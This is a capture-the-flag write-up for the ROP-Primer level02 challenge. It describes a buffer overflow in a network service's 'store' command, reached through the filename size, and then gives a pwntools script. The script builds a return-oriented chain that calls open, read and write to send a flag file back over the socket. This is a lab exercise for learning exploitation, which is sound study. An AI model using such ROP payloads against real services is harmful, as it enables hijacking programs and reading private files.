ROP-2




ROP-PRIMER level02


This problem has to exploited remotely I used strace to find what binary is doing and then i came to know it was calling htons(8888,,,,) so the port is 8888
so i did nc localhost 8888 . So it was having a 2 cmd's 1.Read,Store . The Store cmd especially the file-name had a vulnerability it was using
filesize as filename size so we can overflow it . So then i found eip offset to be 64 then it's time to find a gadget and exploit the binary so i
searched for "flag" string in the binary luckily i had one then used open() function to open the flag then read() that into a bss section and finally write it
to the socket using write()

NOTE : to find the file discriptor use ltrace -f ./level01 (f for fork mode ) so i got 3 -- for file descriptor && 4 for socket discriptor



from pwn import * flag=0x804a128 open_flag=0xf7ed3230 read_flag=0xf7ed3710 write_flag=0xf7ed3790 pop2ret=0x8048ef7 pop3ret=0x8048ef6 bss=0x0804a000 payload="A"*64 payload+=pack(open_flag)+pack(pop2ret)+pack(flag)+pack(0) payload+=pack(read_flag)+pack(pop3ret)+pack(3)+pack(bss)+pack(32) payload+=pack(write_flag)+pack(0xdeadbeef)+pack(4)+pack(bss) p=process('level1') r=remote('127.0.0.1',8888) msg=r.recvuntil('>') print msg r.sendline('store\n') msg=r.recvuntil('>') print msg r.sendline('500\n') msg=r.recvuntil('>') print msg r.sendline('Hello world\n') msg=r.recvuntil('>') print msg r.sendline(payload+"\n") msg=r.recvlines(10) # or u can try giving p.revuntil('}') print msg